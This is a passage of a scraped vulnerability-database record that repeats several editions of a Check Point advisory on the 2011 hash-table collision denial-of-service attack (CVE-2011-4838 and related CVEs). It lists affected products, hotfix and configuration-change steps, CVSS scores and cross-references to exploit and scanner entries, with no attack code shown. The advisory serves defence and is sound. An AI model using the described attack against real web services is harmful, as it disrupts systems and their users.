Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-04T23:07:03", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26122", "SSV:26126", "SSV:72454", "SSV:26121", "SSV:30071"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863706", "OPENVAS:71568", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863681", "OPENVAS:70754", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310870638", "OPENVAS:870638", "OPENVAS:863681", "OPENVAS:863921", "OPENVAS:1361412562310122001", "OPENVAS:136141256231071568", "OPENVAS:881167", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2011-17551.NASL", "FEDORA_2011-17542.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0420.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "SOLARIS11_RUBY_20120417.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "DEBIAN_DLA-209.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "FEDORA_2012-0504.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2012-1262.NASL", "REDHAT-RHSA-2012-0070.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:76D5120DE0", "FEDORA:4930D21410", "FEDORA:3EA60213F3", "FEDORA:6D8EE20EB6", "FEDORA:3515C213E6", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-041"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069", "RHSA-2012:0092"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-04T23:07:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-04T23:07:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-04T23:07:03", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-05T23:14:58", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26122", "SSV:26126", "SSV:72454", "SSV:26121", "SSV:30071"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863706", "OPENVAS:71568", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863681", "OPENVAS:70754", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310870638", "OPENVAS:870638", "OPENVAS:863681", "OPENVAS:863921", "OPENVAS:1361412562310122001", "OPENVAS:136141256231071568", "OPENVAS:881167", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2011-17551.NASL", "FEDORA_2011-17542.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0420.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "SOLARIS11_RUBY_20120417.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "DEBIAN_DLA-209.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "FEDORA_2012-0504.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2012-1262.NASL", "REDHAT-RHSA-2012-0070.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:76D5120DE0", "FEDORA:4930D21410", "FEDORA:3EA60213F3", "FEDORA:6D8EE20EB6", "FEDORA:3515C213E6", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-041"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069", "RHSA-2012:0092"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-04T23:07:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-04T23:07:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-05T23:14:58", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-06T03:31:41", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126", "SSV:30001"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863954", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310870529", "OPENVAS:831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218", "OPENVAS:881075", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:71568", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310863921", "OPENVAS:863921", "OPENVAS:881167", "OPENVAS:870638", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0019.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "FEDORA_2011-17551.NASL", "ALA_ALAS-2012-35.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "MANDRIVA_MDVSA-2012-024.NASL", "DEBIAN_DLA-209.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "GENTOO_GLSA-201207-06.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0069.NASL", "F5_BIGIP_SOL13588.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0504.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0069.NASL", "FEDORA_2012-1262.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3515C213E6", "FEDORA:BFF2C21133", "FEDORA:8CC7E20B55", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069", "ELSA-2012-0019"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0019", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-06T03:31:41", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-06T03:31:41", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-06T03:31:41", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-06T07:08:19", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", 